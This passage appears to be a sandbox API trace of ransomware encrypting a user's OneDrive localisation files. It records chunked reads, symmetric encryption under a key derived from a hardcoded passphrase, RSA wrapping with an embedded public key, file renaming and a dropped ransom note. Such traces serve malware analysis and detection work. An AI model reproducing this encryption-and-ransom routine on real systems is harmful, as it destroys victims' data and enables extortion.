lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.645] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.645] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.646] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.646] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0281.647] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x350, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x360) returned 1 [0281.647] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x360, lpOverlapped=0x0) returned 1 [0281.647] CloseHandle (hObject=0x5d80) returned 1 [0281.647] CloseHandle (hObject=0x5d4c) returned 1 [0281.647] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.653] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.653] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.655] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.657] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.657] CryptDestroyKey (hKey=0x2fc5c8) returned 1 [0281.657] CryptReleaseContext (hProv=0x2f1ec40, dwFlags=0x0) returned 1 [0281.657] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.658] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.658] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\readme_back_files.htm")) returned 0xffffffff [0281.658] AreFileApisANSI () returned 1 [0281.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0281.658] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.659] GetFileType (hFile=0x5d3c) returned 0x1 [0281.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.660] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.660] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.663] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.663] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.663] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.663] GetLastError () returned 0x0 [0281.663] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.663] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.664] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.665] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.666] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.666] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1eb30) returned 1 [0281.670] CryptCreateHash (in: hProv=0x2f1eb30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.670] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.670] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.670] CryptDeriveKey (in: hProv=0x2f1eb30, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc248) returned 1 [0281.670] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.670] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.671] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1ec40) returned 1 [0281.672] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1ec40, dwCertEncodingType=0x1, pInfo=0x2f36940*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36970*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36978*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc688) returned 1 [0281.672] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.672] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ee60*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1ee60*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.673] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1ee60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1ee60*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.674] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.688] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.688] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.693] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.693] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.693] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.693] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.694] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.694] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.694] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.694] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.697] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.698] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.698] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.698] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.698] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.698] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.698] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.698] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.699] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.699] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.699] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.699] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.699] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 